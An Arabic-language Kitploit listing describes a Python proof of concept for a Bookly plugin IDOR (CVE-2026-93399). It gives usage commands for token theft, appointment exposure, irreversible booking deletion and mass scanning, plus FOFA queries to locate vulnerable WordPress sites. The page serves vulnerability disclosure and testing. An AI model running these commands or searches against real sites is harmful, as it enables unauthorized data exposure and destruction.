Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-93399 — Python PoC لـ CVE-2026-93399، وهو IDOR غير مُصادق عليه في Bookly <= 28.2 يؤدي إلى تسريب رموز الطلبات، وكشف المواعيد، والتراجع عن الحجوزات. | Kitploit
أدوات/GitHubGitHub/murrez/cve-2026-93399
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراق
GitHubmurrez/cve-2026-93399

CVE-2026-93399

Python PoC لـ CVE-2026-93399، وهو IDOR غير مُصادق عليه في Bookly <= 28.2 يؤدي إلى تسريب رموز الطلبات، وكشف المواعيد، والتراجع عن الحجوزات.

عرض المستودع
4منذ 9س 14دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-93399 — Bookly IDOR (الكشف عن رمز الطلب والتراجع عن الحجز)

Python 3 PoC لـ CVE-2026-93399 في Bookly (bookly-responsive-appointment-booking-tool).

الوصف (PoCbit / GitHub)

CVE-2026-93399 — Bookly ≤ 28.2 يعاني من مرجع كائن مباشر غير آمن (CWE-639) في AJAX الحجز العام: bookly_get_form_id يخزّن order_id الذي يتحكم به المهاجم في جلسة النموذج، و**bookly_render_complete** يعيد رمز bookly_order السري الخاص بذلك الطلب دون التحقق من أن الجلسة أنشأت الطلب. يمكن للمهاجمين غير المصادق عليهم تعداد معرّفات الطلبات، وسرقة الرموز، وسحب بيانات المواعيد عبر bookly_add_to_calendar، وإلغاء/حذف الحجوزات غير المكتملة باستخدام bookly_rollback_order. CVSS 3.1: 9.1 حرج (C:N/I:H/A:H). تم إصلاحه في > 28.2.

صفحة PoC: https://pocbit.org/pocs/cve-2026-93399

PoCbit

فهرس الكتالوج: https://pocbit.org/pocs/

الاستخدام

root@kitploit:~
pip install -r requirements.txt

python poc.py -u https://site.example --mode check
python poc.py -u https://site.example --mode check --order-id 15
python poc.py -u https://site.example --mode check --order-start 1 --order-end 30

python poc.py -u https://site.example --mode exploit --order-id 15 --calendar
python poc.py -u https://site.example --mode exploit --order-id 15 --rollback --confirm-delete
python poc.py --list targets.example.txt --mode check -j 10 --order-start 1 --order-end 5

FOFA

root@kitploit:~
body="/wp-content/plugins/bookly-responsive-appointment-booking-tool/"
body="bookly_get_form_id"

قانوني

للاختبار المصرّح به فقط. --rollback --confirm-delete يحذف الحجوزات نهائيًا.

تنزيل الأداة